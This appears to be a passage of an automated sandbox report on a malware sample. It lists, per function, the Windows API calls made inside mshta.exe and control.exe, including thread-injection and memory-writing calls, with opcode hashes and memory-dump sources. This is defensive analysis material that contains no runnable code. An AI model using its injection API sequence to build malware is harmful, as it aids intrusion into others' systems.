Part of subcall function 00B364DE: StrChrA.SHLWAPI(00000000,0000003F,?,?,00B18663,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,00B21117,00000008,?), ref: 00B364F6

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00B18663,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 00B17D71
lstrcpy.KERNEL32(00000000,00000000), ref: 00B17D81
lstrcpy.KERNEL32(00000000,00000000), ref: 00B17D8D

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: b2cf36b994a7bad4444c47d2741c066647c794874ffaf134c2d81a5a007a3241
Instruction ID: e857ee6e151effa6c62e3062d59f18b1266fd1daae249696d600b50a71903720
Opcode Fuzzy Hash: b2cf36b994a7bad4444c47d2741c066647c794874ffaf134c2d81a5a007a3241
Instruction Fuzzy Hash: C32193B6508219EFCB115F64EC84AAE7FF8EF55380F5480E5F9059B212DB30C94487A1

Uniqueness

Uniqueness Score: -1.00%

Function 00B18E40, Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B18E74
memset.NTDLL ref: 00B18E8B
memset.NTDLL ref: 00B18EA2
memset.NTDLL ref: 00B18EBA

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 8e1e96f9083b6ae4b77af645ff5ceb7a5e9aab250dc59b110d2646d02a46ea1c
Instruction ID: 4497e5353eca6148d5c50636465766265a46bbb7ce82d73941a5ea67e1a4c68d
Opcode Fuzzy Hash: 8e1e96f9083b6ae4b77af645ff5ceb7a5e9aab250dc59b110d2646d02a46ea1c
Instruction Fuzzy Hash: EA11A37350091DBBC7205F90EC45AA777A9FF09314B840298F94895811DB72F9F5DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00B2A587, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,73BB81D0,00B34BD7,612E002F,00000000), ref: 00B2A593
lstrlen.KERNEL32(?), ref: 00B2A59B

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

lstrcpy.KERNEL32(00000000,?), ref: 00B2A5B2
lstrcat.KERNEL32(00000000,?), ref: 00B2A5BD

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 1836182685890797101358678f2f825850df893e86b7b3376d22067bc6c7b67b
Instruction ID: 7898700157b384bdc12398cbc4a9a43cbd9f9f3680cb2d7582f98f69c97c6aaf
Opcode Fuzzy Hash: 1836182685890797101358678f2f825850df893e86b7b3376d22067bc6c7b67b
Instruction Fuzzy Hash: 8FE01233805721BBC7125BA4AC08C8FBBA9EF88360B154955F55493124CF31C919CBA2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mshta.exe PID: 5676 Parent PID: 3424 mshta.exeCOMMON

Executed Functions

Function 000001A218F00FB9, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000003.804395404.000001A218F00000.00000010.00000001.sdmp, Offset: 000001A218F00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 600bf943a0d68c12ccb02ff0b546bde657c64c611682086389cbaa8ab2534468
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: F590021459640659D51512950C8529C6042A3D9251FD44491C41690244D89D029621D3

Uniqueness

Uniqueness Score: -1.00%

Function 000001A218F00FC1, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000003.804395404.000001A218F00000.00000010.00000001.sdmp, Offset: 000001A218F00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 600bf943a0d68c12ccb02ff0b546bde657c64c611682086389cbaa8ab2534468
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: F590021459640659D51512950C8529C6042A3D9251FD44491C41690244D89D029621D3

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: control.exe PID: 5152 Parent PID: 5032 control.exeCOMMON

Executed Functions

Function 009669DC, Relevance: 9.4, APIs: 4, Strings: 1, Instructions: 643memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00966A81

Strings

@, xrefs: 00966EAF

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: AllocateHeap
String ID: @
API String ID: 1279760036-2766056989
Opcode ID: c78dfe4986b3b7ab0c07a7395de6ec1542942ede4574b36e69ef8a2a4bf9d29c
Instruction ID: 70210e5942e75182ce7b5bc38777c3b3b18da106f0c59afab421833cb622cf2f
Opcode Fuzzy Hash: c78dfe4986b3b7ab0c07a7395de6ec1542942ede4574b36e69ef8a2a4bf9d29c
Instruction Fuzzy Hash: 86129231618F098FDB69EF68E895A66B3E5FB98301F50462EE44AC3251DF34EC41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0098D9EC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationToken.NTDLL ref: 0098DAA0
NtQueryInformationToken.NTDLL ref: 0098DAE8
NtClose.NTDLL ref: 0098DB20

Strings

0, xrefs: 0098DA4B

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: InformationQueryToken$Close
String ID: 0
API String ID: 459398573-4108050209
Opcode ID: 6c43f2ff5960bfd09b278ba2e093a21fe4c2b6a85f32282c41a7dce24e558e14
Instruction ID: e67571a4a66c48af72b47e17938a7589da01ef9b87894bc3766dae90f16a4488
Opcode Fuzzy Hash: 6c43f2ff5960bfd09b278ba2e093a21fe4c2b6a85f32282c41a7dce24e558e14
Instruction Fuzzy Hash: A2313D30219B488FDB64EF59D8C479AB7E6FBD8311F40492EE48EC3250DB349905CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00967DA0, Relevance: 6.2, APIs: 4, Instructions: 197nativethreadinjectionCOMMON

Download Yara Rule

APIs

NtSetInformationProcess.NTDLL ref: 00967E6A
CreateRemoteThread.KERNELBASE ref: 00967F1A

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: CreateInformationProcessRemoteThread
String ID:
API String ID: 3020566308-0
Opcode ID: c185141331431ee5cdf85aa24eddb23adc2d6783160dbf5f9b5260367a73f9e0
Instruction ID: 312bfab486431bc5470374e4eaadde6cc8b13403072c49654e06ae33e2b943b0
Opcode Fuzzy Hash: c185141331431ee5cdf85aa24eddb23adc2d6783160dbf5f9b5260367a73f9e0
Instruction Fuzzy Hash: 0451D13061CB098FD768EFA8D89967AB7E5FB98305F00452EE94AC3261DF34DC458B81

Uniqueness

Uniqueness Score: -1.00%

Function 00984B78, Relevance: 4.8, APIs: 3, Instructions: 297memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE ref: 00984BD1
VirtualAlloc.KERNELBASE ref: 00984CD5
VirtualFree.KERNELBASE ref: 00984DC3

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: Virtual$AllocCreateFreeHeap
String ID:
API String ID: 2341667014-0
Opcode ID: a7761d1f540d36a5bd1c158696eb7ed9b0c136a9635e4a3f037942ce55945ef5
Instruction ID: 106cd33bcfd707193680a7402d88aded8d76460543931885469fe65860305fda
Opcode Fuzzy Hash: a7761d1f540d36a5bd1c158696eb7ed9b0c136a9635e4a3f037942ce55945ef5
Instruction Fuzzy Hash: 71918531608B098FE758EF28EC4576677E5FB98311F50492EE88BC3391EE79D8458B41

Uniqueness

Uniqueness Score: -1.00%

Function 00985428, Relevance: 4.2, APIs: 2, Instructions: 1183synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexExA.KERNEL32 ref: 009854F3
GetUserNameA.ADVAPI32 ref: 00985787

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: CreateMutexNameUser
String ID:
API String ID: 3764123871-0
Opcode ID: 87ac470075bc0bacb572c229852d65eb044723e41051ddc64d69b327a8f4ccdf
Instruction ID: a56edafdd55224aea00854052770cad62923138b7d105647c47415f1ab9a36bd
Opcode Fuzzy Hash: 87ac470075bc0bacb572c229852d65eb044723e41051ddc64d69b327a8f4ccdf
Instruction Fuzzy Hash: 8382C371618E08CFE718FF68EC856A977E5F794301B50852ED48BC7262DE38D946CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00961148, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL ref: 009612EA

Part of subcall function 0096B980: NtMapViewOfSection.NTDLL ref: 0096B9CC

Strings

0, xrefs: 009612DE

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: Section$CreateView
String ID: 0
API String ID: 1585966358-4108050209
Opcode ID: e57371574537f2eab6533fcaa458471152979c9b8311e2795d0fbf369da6fad1
Instruction ID: 41516caab157572e916bb878ed9e8003950e902f0edbe56324b06b1e9fb6c58a
Opcode Fuzzy Hash: e57371574537f2eab6533fcaa458471152979c9b8311e2795d0fbf369da6fad1
Instruction Fuzzy Hash: 6361D47060CF098FDB55EF28D889A65B7E9FB99301F14496EE84AC7261DB34D841CB82

Uniqueness

Uniqueness Score: -1.00%

Function 009846EC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 00984729

Strings

@, xrefs: 0098470D

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: AllocateMemoryVirtual
String ID: @
API String ID: 2167126740-2766056989
Opcode ID: 1e256e41a5e0b4c77fe328a53778c3efd8f6c403ca70e86491a9d6de28cddb97
Instruction ID: 5a07d692ebc15bdec212ddaf5e3fc5d7cb3113b22021bf8d52b823f31645fa6d
Opcode Fuzzy Hash: 1e256e41a5e0b4c77fe328a53778c3efd8f6c403ca70e86491a9d6de28cddb97
Instruction Fuzzy Hash: 18F09070614A048BDB44EFA8D8CC67E77E0FB9C301F500D6DE10ACB254DB7899048782

Uniqueness

Uniqueness Score: -1.00%

Function 009A1002, Relevance: 3.3, APIs: 2, Instructions: 336nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 009A127A
NtProtectVirtualMemory.NTDLL ref: 009A1309

Memory Dump Source

Source File: 00000018.00000002.863401094.00000000009A1000.00000040.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a21c4f4851b31de1fc618929002d68faee0cb7ea61a13706e313701b8415cef8
Instruction ID: 8517f0862b61b2e81b472acd27ba3afd74ff51a7c503dae0666929da2220992f
Opcode Fuzzy Hash: a21c4f4851b31de1fc618929002d68faee0cb7ea61a13706e313701b8415cef8
Instruction Fuzzy Hash: 36A1083121CB884FC729DF28DC817A9B7E1FB96310F58496ED4CBC7252D634E9468786

Uniqueness

Uniqueness Score: -1.00%

Function 009840A4, Relevance: 1.7, APIs: 1, Instructions: 183nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 00984119

Part of subcall function 0097F0D0: NtReadVirtualMemory.NTDLL ref: 0097F0EF

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: InformationMemoryProcessQueryReadVirtual
String ID:
API String ID: 1498878907-0
Opcode ID: 0925fb01f186d30581a0594475e23cb70430e6ccc09a708ef7cd4bd9798eba35
Instruction ID: 524e77cd01481886d4c0ec3d1bbde27c5b9650e3b49f3e3eca3e1a4bb918cf5e
Opcode Fuzzy Hash: 0925fb01f186d30581a0594475e23cb70430e6ccc09a708ef7cd4bd9798eba35
Instruction Fuzzy Hash: AF516D3121CB498BDB59FF28E8957A677E9FBD8300F04452EA85EC3245EE34D945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00971084, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 009710AA

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: fbf7a996bacbb3ee31b6b5631fb3dcd82c34a13d7030801ae3fd3b270ab54767
Instruction ID: 5860f7dde223ca7e8eb643760fd5b0e09f3b87ec880c41fc22b1d28000e54405
Opcode Fuzzy Hash: fbf7a996bacbb3ee31b6b5631fb3dcd82c34a13d7030801ae3fd3b270ab54767
Instruction Fuzzy Hash: 0D018131314E4D8F9B94EF6DD8C4E2577E5FBA8305754856EA44EC3124D738D982CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0096B980, Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 0096B9CC

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction ID: c46f6fca027384ca6740d6d200dd17280b376bbdf6526b07bf9884743926534a
Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction Fuzzy Hash: 5501D670A08B048FCB44DF69D0C8569BBE1FB58315B10066FE949C7796DB70D885CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0097F0D0, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL ref: 0097F0EF

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: 98c43e4811e0ef9f2c3bccd86db570857a0f703cdd521d5af95d2901f496d8ac
Instruction ID: 8d1d863e5ccf8d352ff55357f44cb7b9cd4597823fbbbe2641c4f8dee1ad5704
Opcode Fuzzy Hash: 98c43e4811e0ef9f2c3bccd86db570857a0f703cdd521d5af95d2901f496d8ac
Instruction Fuzzy Hash: EEE0DF31718A448BEB006BB48CC933873D1F788305F508839E94AD7320E63DC8448302

Uniqueness

Uniqueness Score: -1.00%

Function 00981DF4, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL ref: 00981E13

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 48080753a69cc5c2f213f4c569dea42342d9751270c113248a2afbd67c56a58c
Instruction ID: 2c1663765271d380dcc3b70c73f5ff0277020b36e3a1edbfb07570d286eb13b6
Opcode Fuzzy Hash: 48080753a69cc5c2f213f4c569dea42342d9751270c113248a2afbd67c56a58c
Instruction Fuzzy Hash: 11E0DF30725A444BEB047FB898C92B973E5FB88301F404839F986C3361DA2DC8468302

Uniqueness

Uniqueness Score: -1.00%

Function 0097FD58, Relevance: 6.2, APIs: 4, Instructions: 237threadinjectionCOMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNELBASE ref: 0097FE78
ResumeThread.KERNELBASE ref: 0097FEB6
SuspendThread.KERNELBASE ref: 0097FEDA
VirtualProtectEx.KERNELBASE ref: 0097FF58

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: ProtectThreadVirtual$ResumeSuspend
String ID:
API String ID: 3483329683-0
Opcode ID: cc4868ada8e792d7079d3c318e0fdf0f33717d4a911865a1e8ed9efcbc2d9593
Instruction ID: 0376ee235b9e005fd00c50af1913d09521147f8134aa76c36dcb92963b69c425
Opcode Fuzzy Hash: cc4868ada8e792d7079d3c318e0fdf0f33717d4a911865a1e8ed9efcbc2d9593
Instruction Fuzzy Hash: 9761923161CB084FD768EB18E8957AA73D5FBD9305F10853DE58EC3291DF38D9418A86

Uniqueness

Uniqueness Score: -1.00%

Function 00977E14, Relevance: 6.1, APIs: 4, Instructions: 146fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE ref: 00977EE5
SetFilePointer.KERNELBASE ref: 00977EFF
ReadFile.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00966D8C), ref: 00977F21
FindCloseChangeNotification.KERNELBASE ref: 00977F3C

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: File$ChangeCloseCreateFindNotificationPointerRead
String ID:
API String ID: 2405668454-0
Opcode ID: f54299aa0c2ec5c7f40b58ebf012af719612c490748651b1035cc79a9b7743ad
Instruction ID: cceaf0f4971ed8ab5393001ee70d7e36b0a6f0cf1931f76bf536700e100989cd
Opcode Fuzzy Hash: f54299aa0c2ec5c7f40b58ebf012af719612c490748651b1035cc79a9b7743ad
Instruction Fuzzy Hash: 0641E63121CA084FDB58DF68D8C4669B7E1FB98314B25C66DE09EC7262DB34D843CB81

Uniqueness

Uniqueness Score: -1.00%

Function 009628F4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00966454: RegCreateKeyA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0096F46A), ref: 00966477

RegQueryValueExA.KERNELBASE ref: 0096295D

Strings

(, xrefs: 009629A5
(, xrefs: 00962969

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: CreateQueryValue
String ID: ($(
API String ID: 2711935003-222463766
Opcode ID: 70439f1d931ef6deb6e63df803fed06741b5ae7351a7f71008e576bc43ffe359
Instruction ID: 6a0d444a3e9413ea80484b195ba80502b8729c0f4a232c854c62c168c73fc1e4
Opcode Fuzzy Hash: 70439f1d931ef6deb6e63df803fed06741b5ae7351a7f71008e576bc43ffe359
Instruction Fuzzy Hash: 1E31957421CB488FE716DF54EC59766B7EDF788308F50462DE44AC22A0EFB89545CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0099187C, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 009919B9

Strings

H, xrefs: 009918A0

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: H
API String ID: 1029625771-2852464175
Opcode ID: 92e5d1011d5ac3511481310b22acfc4ae377deef14846c082cbaeb4d2dd61773
Instruction ID: 2280ae895ddd57c144fad7e28bcdfcd97c704d976f051f7c9553bf293d2a145e
Opcode Fuzzy Hash: 92e5d1011d5ac3511481310b22acfc4ae377deef14846c082cbaeb4d2dd61773
Instruction Fuzzy Hash: F9A1B030508F4A8FEB55DF1CD8886A6B3E5FBA8301F04462ED84AC7265EF38D945CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0098144C, Relevance: 3.2, APIs: 2, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0097DE40: VirtualProtect.KERNELBASE ref: 0097DE73

VirtualProtect.KERNELBASE ref: 0098156A
VirtualProtect.KERNELBASE ref: 0098158D

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1c0704a25bf5be91b83301073394ca08df2f1bf8a09adb724fde02ed8a8c5447
Instruction ID: 2e0c2ba0f52362859fe6785062d2d16e7e696741c7d7ed7a7cc875b3c73d2716
Opcode Fuzzy Hash: 1c0704a25bf5be91b83301073394ca08df2f1bf8a09adb724fde02ed8a8c5447
Instruction Fuzzy Hash: F1517F70618B098FDB44EF29D889B65B7E4FB98310F14456EA48EC3661EB34E941CB82

Uniqueness

Uniqueness Score: -1.00%

Function 009630E8, Relevance: 3.1, APIs: 2, Instructions: 147COMMON

Download Yara Rule

APIs

StrRChrA.KERNELBASE ref: 00963146
RtlAddVectoredContinueHandler.NTDLL ref: 0096323A

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: ContinueHandlerVectored
String ID:
API String ID: 3758255415-0
Opcode ID: 9da6f8a69fee232d1e37c8dd212754dc583ca413fd983eb3bd025031f98905c0
Instruction ID: 418d067f7177a9e9cf73ac3a4103b007564d2cd0617ce27561171f9d886e8366
Opcode Fuzzy Hash: 9da6f8a69fee232d1e37c8dd212754dc583ca413fd983eb3bd025031f98905c0
Instruction Fuzzy Hash: 8541D73060CB098FEB56EF28985833A77EAEB99311B55816FE45AC3261DF78C605C705

Uniqueness

Uniqueness Score: -1.00%

Function 0097B680, Relevance: 3.1, APIs: 2, Instructions: 106registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE ref: 0097B6DA
RegCloseKey.KERNELBASE ref: 0097B753

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: CloseOpen
String ID:
API String ID: 47109696-0
Opcode ID: 895ca3848e1854b5908d37677b863bd9385aabb884482b7afaebc8110255833e
Instruction ID: f2aadcd1d6ad0be99370e2e82b1870c33ec33885b0c43a432516d182befe3b47
Opcode Fuzzy Hash: 895ca3848e1854b5908d37677b863bd9385aabb884482b7afaebc8110255833e
Instruction Fuzzy Hash: F0316631618B0C4F9B58EF68E894A5673E1F7D8304B414A7EE04EC3251DB34D945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00965688, Relevance: 3.1, APIs: 2, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE ref: 009656CB
RegQueryValueExA.KERNELBASE ref: 0096574F

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 25e46b6b162278b58929d3e30fc5361dae4b3f993070cf997e6e895138193d36
Instruction ID: 1c6dd52cb95e3c71982d8bf6bb85230bfbdac1139f81b1417e0a28779d9f7b5e
Opcode Fuzzy Hash: 25e46b6b162278b58929d3e30fc5361dae4b3f993070cf997e6e895138193d36
Instruction Fuzzy Hash: 0331913051CF088FDB58EF18D8C9666B7E1FBA8301F15452EE84AC3251DB34DC418B82

Uniqueness

Uniqueness Score: -1.00%

Function 0096B78C, Relevance: 3.1, APIs: 2, Instructions: 96registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE ref: 0096B7CA
RegCloseKey.KERNELBASE ref: 0096B837

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 6ac68a6974238a40d0c984016d621410adb46f5d007b7ffb866acaf623e2f92d
Instruction ID: a365031197e77f836537864e886812a366783f3fe0fbd2fbad207032182709bd
Opcode Fuzzy Hash: 6ac68a6974238a40d0c984016d621410adb46f5d007b7ffb866acaf623e2f92d
Instruction Fuzzy Hash: 7D215130619A088FE758EF68E88973577E5FB98351F20456EE449C3261EB34D982CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00966454, Relevance: 3.1, APIs: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0096F46A), ref: 00966477
RegOpenKeyA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0096F46A), ref: 00966484

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: CreateOpen
String ID:
API String ID: 436179556-0
Opcode ID: 902b66cc257e73447aee148ba8278d1e0121bd882bb4cf5686835d95125ccaa8
Instruction ID: 42013b0a060bd560ef6e037dd842a40322c937c9780dfc95b79f75484203937b
Opcode Fuzzy Hash: 902b66cc257e73447aee148ba8278d1e0121bd882bb4cf5686835d95125ccaa8
Instruction Fuzzy Hash: 4B018031A1CA548FDB88EB5C9488A29BBE5EBE8341F10042EE94DC3371DE74D9418783

Uniqueness

Uniqueness Score: -1.00%

Function 00985128, Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00985158
QueueUserAPC.KERNELBASE(?,?,?,?,?,?,?,-00000002,00976903), ref: 0098516F

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: CreateQueueThreadUser
String ID:
API String ID: 3600083758-0
Opcode ID: 0859e9f174d93852fe63f47882d4427114e85758686e88d4c4f6dafd6fbe1a42
Instruction ID: 59a76845283b9fda1e27460fb906665b292f331ecc5ca2e331861da583798324
Opcode Fuzzy Hash: 0859e9f174d93852fe63f47882d4427114e85758686e88d4c4f6dafd6fbe1a42
Instruction Fuzzy Hash: 1C017131718A088FEB94EF6CD84D73977E2E7A8311B04456AE40AC3374DB78DC458B82

Uniqueness

Uniqueness Score: -1.00%

Function 0097E8E4, Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0097EA30

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 2b30ea30a43a7e8191f5f9e07f64b3cb52e52f56fb394bd181dd2d5887e97efc
Instruction ID: 5e784306b9b2cc26d0023bcc00428554b3254056e96664d8c51940d3379ee579
Opcode Fuzzy Hash: 2b30ea30a43a7e8191f5f9e07f64b3cb52e52f56fb394bd181dd2d5887e97efc
Instruction Fuzzy Hash: 2561A531618F099FDB98EF18D485A65B7E4FBAC311B50855EE84EC3261EB34E841CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00979248, Relevance: 1.6, APIs: 1, Instructions: 107processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE ref: 009792EC

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b2891019674e33eb7a2f83fc06db53c89b6675b4f60fb54dc4e98739e3fc4bca
Instruction ID: 088ff4bce77f395507e36e19bf3f456e09fabdb0a55f28dbfaca808cb16fe743
Opcode Fuzzy Hash: b2891019674e33eb7a2f83fc06db53c89b6675b4f60fb54dc4e98739e3fc4bca
Instruction Fuzzy Hash: C9314F7160CB488FDBA4EF5D9889A65B7E5FB98311F10466EE84DC3262DA30EC418786

Uniqueness

Uniqueness Score: -1.00%

Function 0097E584, Relevance: 1.6, APIs: 1, Instructions: 105COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32(?,?,?,?,?,00000004,00985D72), ref: 0097E661

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: eaa6c74ad2a1b8695acd0f9aa78067ea1eca20e73f458ede766fbc5ba9ae525c
Instruction ID: d9edcec404fbdc8a73697b369a9330023659e05e37e9b11134f555c167ff2ee7
Opcode Fuzzy Hash: eaa6c74ad2a1b8695acd0f9aa78067ea1eca20e73f458ede766fbc5ba9ae525c
Instruction Fuzzy Hash: 4A314F31718A058FEB59EF78D8D5AAA73E7EBD8304755C52AA407C3265DF38E8018741

Uniqueness

Uniqueness Score: -1.00%

Function 00976064, Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

RtlDeleteBoundaryDescriptor.NTDLL ref: 00976106

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

